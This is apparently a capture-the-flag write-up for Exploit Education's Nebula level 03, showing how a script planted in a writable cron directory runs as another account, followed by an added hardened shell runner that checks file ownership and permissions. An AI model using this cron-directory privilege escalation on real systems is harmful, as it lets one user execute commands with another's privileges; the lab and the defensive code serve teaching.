Exploit-Education Nebula Level 03


Exploit Education Level 3

Challenge

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. Crontab is a service that runs periodically. In this example, the crontab executes the contents of any file inside the crontab.d directory.

Vulnerability

We can run any command by writing it to a file in the crontab directory. Redirecting the command's output to a file lets us read the result once the crontab has run:

level03@nebula:echo 'getflag >>/tmp/flag.txt' > run.sh
level03@nebula:/tmp$ ls
flag.txt  VMwareDnD  vmware-root
level03@nebula:/tmp$ cat flag.txt
You have successfully executed getflag on a target account

Solved
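
The defensive counterpart to the job described above, as an added example that is not part of the original write-up or the Nebula image: a runner that executes a file only when both the directory and the file are owned by the job's own user and are not writable by group or others. The function names (`safe_to_run`, `run_dir`) and the `--run` argument are hypothetical.

```shell
#!/bin/sh
# Added example: hardened version of a cron job that runs every file in a
# directory. Function names are hypothetical, not taken from the Nebula image.

# True if group or others have write permission on $1.
writable_by_others() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# True if $1 is owned by the user the job runs as.
owned_by_me() {
    [ -n "$(find "$1" -prune -user "$(id -u)" -print 2>/dev/null)" ]
}

# Succeeds only when no other account could have planted or altered the script.
safe_to_run() {
    script=$1
    dir=$(dirname "$script")
    # Regular files only: a symlink could point at content someone else controls.
    if [ ! -f "$script" ] || [ -L "$script" ]; then return 1; fi
    if ! owned_by_me "$dir" || ! owned_by_me "$script"; then return 1; fi
    if writable_by_others "$dir" || writable_by_others "$script"; then return 1; fi
    return 0
}

# Run each file in directory $1 that passes the checks; report the rest.
run_dir() {
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        if safe_to_run "$f"; then
            sh "$f" || echo "failed: $f" >&2
        else
            echo "skipped (unsafe owner or mode): $f" >&2
        fi
    done
}

# Stand-alone use: ./runner.sh --run /path/to/jobs.d
if [ "${1:-}" = "--run" ] && [ -n "${2:-}" ]; then
    run_dir "$2"
fi
```

With these checks in place, a file dropped into the directory by another account is skipped and logged instead of being executed with the job owner's privileges.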